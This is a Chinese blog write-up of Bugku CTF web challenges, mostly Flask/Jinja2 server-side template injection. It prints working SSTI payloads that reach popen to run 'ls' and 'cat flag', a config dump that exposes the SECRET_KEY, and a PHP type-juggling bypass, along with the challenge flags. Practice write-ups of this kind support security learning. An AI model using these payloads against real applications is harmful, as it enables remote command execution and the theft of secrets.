Bugku解题 web (一)

最新推荐文章于 2024-07-30 18:28:53 发布
最新推荐文章于 2024-07-30 18:28:53 发布
阅读量1.6w 收藏 16
点赞数 6
分类专栏: 《从0到1:CTFer成长之路》
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46703850/article/details/115073413
版权
这篇博客介绍了在Bugku平台上的多个Web安全挑战,主要包括Simple_SSTI系列,涉及Python SSTI注入,通过获取os类执行Linux命令来读取flag;Flask_FileUpload挑战,探讨了如何在文件上传中实现注入;以及其他的Web题目,如利用源码泄露、输入验证漏洞等手段获取flag。同时,还提及了一个社工类挑战,涉及信息收集。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Bugku解题 web


介绍:记录解题过程

1 Simple_SSTI_2

python模仿注入(SSTI)

  1. 通过以下语句拿到可用的类的列表
http://114.67.246.176:13299/?flag={{%22%22.__class__.__bases__[0].__subclasses__()}}

在这里插入图片描述

  1. 我们需要的是os命令执行类<class ‘os._wrap_close’>
    在这里插入图片描述

  2. 利用逗号定位
    在这里插入图片描述

  3. 我们可以先看一下我们索引的是否正确,输入url

/?flag={{"".__class__.__bases__[0].__subclasses__()[127]}}

在这里插入图片描述

  1. 构造语句,并执行ls命令(对方是Linux服务器,所以要使用Linux命令
/?flag={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}}

在这里插入图片描述

Dockerfile app.py flag gunicorn.conf.py templates
  1. 读flag
/?flag={{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('cat flag').read()}}

在这里插入图片描述

flag{f325fff1f68aec4243a034f722d0833c}

2 Simple_SSTI_1

You need pass in a parameter named flag。

python模仿注入(SSTI)

  1. python模仿注入(SSTI)
    在这里插入图片描述
  2. 首页查看源码
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Simple SSTI</title>
</head>
<body>
You need pass in a parameter named flag。
<!-- You know, in the flask, We often set a secret_key variable.-->
</body>
</html>

你知道,在flask里,我们经常设置一个secret_key变量
  1. so我们要读secret_key变量,导出所有config变量,其中就包括SECRET_KEY
/?flag={{config.items()}}

在这里插入图片描述

flag{f7075118c1f7956690794e58eb0b2198}

3.Flask_FileUpload

描  述: Flask_FileUpload

<html>
<head>
  <title>File Upload</title>
</head>
<body>
    <form action="/uploader" method="POST" enctype="multipart/form-data">
        <input type="file" name="file" accept=".jpg,.png" />
        <input type="submit" />
    </form>
<!-- Give me the file, and I will return the Running results by python to you! -->
</body>
</html>
  1. 上传成功后
file uploaded successfully!<!--   File "/app/upload/simple.png", line 1
SyntaxError: Non-UTF-8 code starting with '\x89' in file /app/upload/simple.png on line 1, but no encoding declared; see http://python.org/dev/peps/pep-0263/ for details -->
  1. Method Not Allowed
    在这里插入图片描述
  2. 要在上传中实现注入
{{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__['popen']('ls').read()}}

在这里插入图片描述
3. cd …/
在这里插入图片描述

  1. cd …/;cat flag
    在这里插入图片描述
flag{a1b5409b110f8658d4264f260807aefc}

4.web1

提  示: 官方交流群:222959472
描  述: flag{}

  1. 查看源码得的flag
<!--flag{5aa7724ad0937437e93acd880c88373c}
 -->

在这里插入图片描述

5.web2

描  述: 输入验证码即可得到flag

1 长度限制改为2
在这里插入图片描述

flag{49e5e23c0b45249426b1777ba3445a50}

6.web3

  1. 首页
    在这里插入图片描述

  2. 得的flag
    在这里插入图片描述

7.web4

描  述: post

  1. 首页
    在这里插入图片描述
  2. 得的flag
    在这里插入图片描述

8.web5

描  述: 矛盾

$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}
  1. 数字后面加个非数字的即可
    在这里插入图片描述
flag{5fe31bef8632c6b6416516e77b9bb7c7}

9. web6

  1. ctrl+U查看源码,然后html解码
    在这里插入图片描述
    HtmlEncode编码/HtmlEncode解码 - 站长工具
flag{3bd205d63ad6e8e6232931745f400d41}

10. web7

描  述: 你必须让他停下

  1. burpSuite抓包查看
    在这里插入图片描述
flag{aeee925d31ebeb19d809d262b729cc1c}

11.社工-初步收集

描  述: 其实是杂项,勉强算社工吧。来自当年实战

  • List item
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 6978
文章目录1.Web22.计器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
Bugku -----Web-----全题目解析 () 超详细步骤
qq_48368964的博客
07-30 1465
在 Flask 中,双大括号 {{ }} 用于表示动态内容的占位符,该内容将由模板引擎渲染。当你在 Flask 模板中使用双大括号把变量或表达式括起来时,它告诉模板引擎去计该表达式并将其值插入到渲染后的 HTML 文档中。例如,你提供的代码 flag={{config.SECRET_KEY}} 将会在 HTML 文档中的该位置渲染 Flask 应用程序的秘密密钥。比如要配置个项目的SECRET_KEY,可以使用app.config['SECRET_KEY'] = "xxx"来进行设置。
BugkuCTF WEB解题记录 1-5
aap49042的博客
08-06 388
写了部分的web题,是把它最基础的部分做了遍,以后的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每五道题的题解以篇文章的形式发表,感谢大家直以来的支持和理解,共勉~~~ web2 打开链接http://120.24.86.145:8002/web2/ 看到的是个充满滑稽脸的网页 ,这个题目很简单 我们直接利用F12查看...
bugku题解-web
qq_51775369的博客
10-08 2375
1.滑稽 进去发现很多滑稽脸,直接f12开发者,就能看到flag 2.
BUGKU刷题——WEB
D.MIND 的博客
12-28 428
<meta http-equiv="refresh" content="3"> 3秒之后刷新本页面或访问指定页面 < meta http-equiv="Refresh" content="秒数; url=跳转的文件或地址" > 设置http-equiv中的refresh属性,可以设置网页3秒之后刷新本页面或访问指定页面 双引号转义问题,JS的转义是使用斜杠 " / " 对于eval函数,参数需要是字符串,且为可执行的函数 eval("alert("\141\75\14
BUGKU--web详解
qq_49422880的博客
05-28 2174
web5-web?前言Web4Web5Web6Web7Web8game1Web11社工-伪造级目录级目录 前言   听说bugku的题很适合新手我就来了,感觉前几题都比较简单也没什么好总结的,就从第四题开始吧,后面要是碰到简单的估计只会略微提起几句,大家要是有不理解的知识点,可以私信我。 Web4   就是考察简单的代码审计,只需要传递的what的变量等于flag即可,于是我们可以构造个payload,用win10的cmd发送,用Burpsuite抓包返包或则firefox的harbar也可以完成这个
BugkuCTF Web
最新发布
2201_75891821的博客
07-30 2069
Bug ku CTF web
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku-web-GET解析过程
weixin_46168073的博客
11-14 1260
、启动场景 二、解题过程 点进去得到 可以看到这是个if语句,判断条件为what=='flag'就会显示出echo 下的'flag",那我们直接在地址后面,写上?what=flag。 然后就得到了flag,直接复制粘贴到记事本,然后在复制粘贴到提交框。 点击提交。 ...
Bugku解题 web ()
weixin_46703850的博客
03-28 1259
Bugku解题 web12.web1113.web1213. web814.web915.web1016. 介绍:记录解题过程 12.web11 描  述: 网站被黑了 黑客会不会留下后门 先用御剑进行扫描,可以获得网站后台 http://114.67.246.176:14175/shell.php, 然后利用Burpsuite暴力破解。 密码是:hack flag{219622b0bf43fe45a8cfa2bca9650de7} 13.web12 描  述: 本地管理员 改成
<Bugku>web解题思路与过程
weixin_45664911的博客
11-03 1003
Bugku (https://ctf.bugku.com/)题:web2(http://123.206.87.240:8002/web2/) 查看源代码:Ctrl+U 检查: Ctrl+Shift+I 查看源代码只可查看代码,不可修改。检查两者兼可。 查看源代码 绿色字体即为flag 第二题:随机数字验证码(http://123.206.87.240:8002/yanzhengma...
bugku web方向所有题解
kekefen01的博客
04-18 3330
题F12,第二题打开js文件,第三题 get参数 第四题转换成post请求最后空行加入what=flag 注意最后不能加回车,不然会把what的值认为是"flag\n" 可以转换post加入参数,再转成get再转换成post 第五题php弱类型 num=1df 随便什么,反正$num==1都能通过 $num=$_GET['num']; if(!is_numeric($num)) { ech...
bugku web题集锦
skysys的研究小屋
06-01 1390
变量1 <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);"); } ?> 正则在线测试:ht
bugku - Web
UP's blog
09-03 3238
刚刚入门CTF,如有错误,望大佬指教
bugku-web 前35题详解 (当然除去题目失效)
team39的博客
05-10 2981
第二题:计器 尝试输入96,发现只能输入位数字,于是输入“9”,点击验证,弹出“输入有误!” F12查看网页源代码,发现输入框的最大长度是1。 于是更改最大长度为100,输入正确答案96,得到flag。 第三题:web基础$_GET 题目分析:根据题面和所给代码,判断出是道GET传参的题。GET传参时请求的参数是在URL中,所以直接在网址后面加上?what=flag。 第四题:web基础$_POST 题目分析:根据题面和所给代码,判断出是道POST传参的题。
Bguku CTF 每日题 Simple_SSTI_1
彼岸花苏陌的博客
01-13 697
Simple_SSTI_1 进入场景 发现出现了提示 要我们输入flag为参数 输入后发现显示了 因为题目提示是SSTI,于是输入{{2*4}} 发现得到了8 确定存在SSTI 但是仅仅如此 按下f12 发现注释里有提示 You know, in the flask, We often set a secret_key variable. 所以说是flask模板注入 注释提示我们去找变量 于是就传flag={{config}} 从返回中找到答案 ...
近日份CTF(2022.11.8)
weixin_45440843的博客
11-08 959
config是Flask模板中的个全局变量,包含了所有应用程序配置的值。打开url后发现没有任何提示,查看源代码有行提示。经过尝试发现此题目使用{{}} 进行回显。可知框架类型为Flask。题目解释为简单模板注入。
CTF之路:关于Flask模板注入
zw05011的博客
01-07 6068
题目 题目叫Simple SSTI 打开网页,显示You need pass in a parameter named flag. SSTI,即服务器端模板注入。
十八、bugku Simple_SSTI_1
山兔的博客
09-06 634
ssti主要为python的些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。 http://114.67.246.176:10828/?flag={{config}} ?flag={{config.SECRET_KEY}} {{}}是变量包裹标识符。{{}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值